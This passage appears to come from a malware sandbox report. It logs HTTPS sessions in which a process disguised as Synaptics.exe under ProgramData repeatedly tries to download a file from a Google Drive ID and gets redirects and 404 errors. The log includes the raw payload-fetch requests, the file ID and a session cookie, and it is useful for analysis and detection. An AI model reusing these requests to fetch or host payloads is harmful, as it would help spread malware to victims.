                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:48 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:48 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-9jbNG8X59LUwMmng5rGZHg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            133 | 192.168.2.8 | 49909 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-12-30 10:49:48 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:48 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:48 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-M7SNPriW8tyrpU_jROxjqw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            134 | 192.168.2.8 | 49912 | 142.250.185.161 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-12-30 10:49:49 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:49 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC7w9XFUSll-1KK49D6GwgDSOVXpXvVVi9o_pBGcE-o8-P2843QqHOsigNzEZ0HZmLsjPx8So9Q
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:49 GMT
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-3hNQjLAx7BCRxjBHP9_RlQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:49 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                            2024-12-30 10:49:49 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="a_vGTOaPcU8925BIbdeObw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                            2024-12-30 10:49:49 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            135 | 192.168.2.8 | 49911 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-12-30 10:49:49 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:49 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:49 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-THnjrc4tSf5M-ExuP9S6aQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            136 | 192.168.2.8 | 49914 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-12-30 10:49:49 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:49 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:49 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-Co5mX4UpZBmoNmOoe3hbZA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            137 | 192.168.2.8 | 49913 | 142.250.185.161 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-12-30 10:49:49 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:50 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC4ig0Hg9Sua_lGMyjQp4zW3AzwzA1n2c-D4Q2s5Ddq9vJywH2D5pAgkMkkjpy4dwPyd
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:49 GMT
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-XlCrI5HnQ6PqhQFlB54k6w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
2024-12-30 10:49:50 UTC | 147 | IN
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:49:50 UTC | 1390 | IN
                                                                                                                                                                            Data Ascii: t Found)!!1</title><style nonce="SuEigAH0DxzVMKRPK7_hlA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:49:50 UTC | 115 | IN
                                                                                                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
138 | 192.168.2.8 | 49918 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:57 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:57 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:57 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-YrN8zSizZcOZuUDpG5USbg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
139 | 192.168.2.8 | 49919 | 142.250.185.161 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:57 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:57 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC6SUhPWWbAXX2Ngyxkqp9LCxsyg0zxCvAbw1wU_6MK4aUdL1C_3d0dH2nCeOblQMN0nQD9XPG0
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:57 GMT
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-08ocrlm4UfArBFAwF3sPvw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
2024-12-30 10:49:57 UTC | 140 | IN
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:49:57 UTC | 1390 | IN
                                                                                                                                                                            Data Ascii: 404 (Not Found)!!1</title><style nonce="wIXY3S6hiecz8d83Pg9u5g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:49:57 UTC | 122 | IN
                                                                                                                                                                            Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
140 | 192.168.2.8 | 49917 | 142.250.185.161 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:57 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:57 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC6mH94JekuDTn1UfEbwtYFPpFcJizbuLapc1Fm63fNpcrcESeov6U-LNd4b_socvB_S
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:57 GMT
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-ZyUy83hu9PffS63YEdemgw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
2024-12-30 10:49:57 UTC | 147 | IN
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:49:57 UTC | 1390 | IN
                                                                                                                                                                            Data Ascii: t Found)!!1</title><style nonce="K_Y9x-Xg3WL8hKQHlfd2UA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                            2024-12-30 10:49:57 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
141 | 192.168.2.8 | 49916 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:57 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
